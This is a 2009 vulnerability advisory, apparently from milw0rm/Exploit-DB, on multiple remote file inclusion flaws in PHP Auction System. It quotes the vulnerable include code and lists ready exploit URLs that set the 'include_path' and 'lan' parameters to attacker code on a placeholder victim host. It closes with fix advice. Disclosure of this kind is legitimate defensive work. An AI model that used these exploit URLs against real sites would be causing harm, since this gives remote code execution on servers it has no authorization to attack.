PHPAuctionSystem - Multiple Remote File Inclusions

EDB-ID:

7678

CVE:

N/A


Platform:

PHP

Published:

2009-01-06

[»]=======================================================================================================[_][-][X]
[»]                                                                             				[»]
[»]      		   PHPAuctionSystem Multiple Remote File Inclusion Vulnerability    			[»]
[»]              				         							[»]
[»]            		 	=======    ------d-------m------     ====    ====   				[»]
[»]             	 	||     =        | |(o o)| |          ||   ||   ||   				[»]
[»]             		||     =          ||(~)||            ||        ||   				[»]
[»]             	 	=======             /|\              ||        ||  				[»]
[»]=============================================================================================================[»]
[»] 				Author         	: ~darkmasking~		 					[»]
[»] 				Date           	: January, 6th 2009           					[»]
[»] 				Web           	: https://www.idsafeshield.com					[»]
[»]           		 	Contact        	: support[at]idsafeshield[dot]com  				[»]
[»]					Critical Level 	: Dangerous			  			[»]
[»]-------------------------------------------------------------------------------------------------------------[»]
[»]              		       Affected software description :        					[»]
[»]   				Software 	: PHP Auction System						[»]
[»]          			Vendor		: http://www.phpauctions.info/					[»]
[»]            			Price 	      	: $59.99							[»]
[»]=============================================================================================================[»]
[»]														[»]
[»]	[~] Vulnerable file											[»]
[»]														[»]
[»]		[+] all file below is affected by "include_path" parameter					[»]
[»]														[»]
[»]		./includes/settings.inc.php									[»]
[»]		$password_file = $include_path."passwd.inc.php";						[»]
[»]		include($password_file);									[»]
[»]		include $include_path."fonts.inc.php";								[»]
[»]		include $include_path."fontsize.inc.php";							[»]
[»]		include($include_path."currency.inc.php");							[»]
[»]		include($include_path."errors.inc.php");							[»]
[»]		include($include_path."https.inc.php");								[»]
[»]														[»]
[»]		./includes/auction_confirmation.inc.php								[»]
[»]		require("./includes/messages.inc.php");								[»]
[»]														[»]
[»]		./includes/converter.inc.php									[»]
[»]		include($include_path."nusoap.php");								[»]
[»]														[»]
[»]		./includes/messages.inc.php									[»]
[»]		require($include_path.'messages.'.$language.'.inc.php');					[»]
[»]														[»]
[»]		./includes/stats.inc.php									[»]
[»]		include $prefix."includes/useragent.inc.php";							[»]
[»]		include $prefix."includes/domains.inc.php";							[»]
[»]														[»]
[»]		./includes/useragent.inc.php									[»]
[»]		include $prefix."includes/browsers.inc.php";							[»]
[»]		include $prefix."includes/platforms.inc.php";							[»]
[»]														[»]
[»]		./includes/user_confirmation.inc.php								[»]
[»]		require("./includes/messages.inc.php");								[»]
[»]														[»]
[»]														[»]
[»]		[+] All file below is affected by "lan" parameter						[»]
[»]														[»]
[»]		./browse.php											[»]
[»]		./search.php											[»]
[»]		if(!empty($_GET['lan'])) {									[»]
[»]			$language = $lan;									[»]
[»]			$_SESSION['language'] = $language;							[»]
[»]														[»]
[»]		#// Set language cookie										[»]
[»]			setcookie("USERLANGUAGE",$lan,time()+31536000,"/");					[»]
[»]		} elseif(empty($_SESSION['language']) && !isset($_COOKIE['USERLANGUAGE'])) {			[»]
[»]			$language = $SETTINGS['defaultlanguage'];						[»]
[»]			$_SESSION['language'] = $language;							[»]
[»]														[»]
[»]		#// Set language cookie										[»]
[»]			setcookie("USERLANGUAGE",$language,time()+31536000);					[»]
[»]		} elseif(isset($_COOKIE['USERLANGUAGE'])) {							[»]
[»]			$language = $_COOKIE['USERLANGUAGE'];							[»]
[»]		}												[»]
[»]														[»]
[»]		require($include_path.'messages.'.$language.'.inc.php');					[»]
[»]														[»]
[»]-------------------------------------------------------------------------------------------------------------[»]
[»]														[»]
[»]	[~] Exploit												[»]
[»]														[»]
[»]	[+] "include_path" parameter										[»]
[»]														[»]
[»]	http://www.darkvictims.com/[path]/includes/settings.inc.php?include_path=[darkcode]			[»]
[»]	http://www.darkvictims.com/[path]/includes/auction_confirmation.inc.php?include_path=[darkcode]		[»]
[»]	http://www.darkvictims.com/[path]/includes/converter.inc.php?include_path=[darkcode]			[»]
[»]	http://www.darkvictims.com/[path]/includes/messages.inc.php?include_path=[darkcode]			[»]
[»]	http://www.darkvictims.com/[path]/includes/stats.inc.php?include_path=[darkcode]			[»]
[»]	http://www.darkvictims.com/[path]/includes/useragent.inc.php?include_path=[darkcode]			[»]
[»]	http://www.darkvictims.com/[path]/includes/user_confirmation.inc.php?include_path=[darkcode]		[»]
[»]														[»]
[»]														[»]
[»]	[+] "lan" parameter											[»]
[»]														[»]
[»]	http://www.darkvictims.com/[path]/browse.php?lan=[darkcode]						[»]
[»]	http://www.darkvictims.com/[path]/search.php?lan=[darkcode]						[»]
[»]														[»]
[»]-------------------------------------------------------------------------------------------------------------[»]
[»]														[»]
[»] 	[~] How to fix this vulnerability									[»]
[»]														[»]
[»]    	Edit the source code to ensure that input is properly validated. Where is possible, 			[»]
[»]    	it is recommended to make a list of accepted filenames and restrict the input to that list.		[»]
[»]														[»]
[»]    	For PHP, the option allow_url_fopen would normally allow a programmer to open, 				[»]
[»]    	include or otherwise use a remote file using a URL rather than a local file path. 			[»]
[»]    	It is recommended to disable this option from php.ini.							[»]
[»]														[»]
[»]-------------------------------------------------------------------------------------------------------------[»]
[»]														[»]
[»]	[~] Greetz												[»]
[»]														[»]
[»]	BUAT DIRI SENDIRI AJA [ Sorry Bro belum dapat teman :) ]						[»]
[»]														[»]
[»]														[»]
[»]=============================================================================================================[»]

# milw0rm.com [2009-01-06]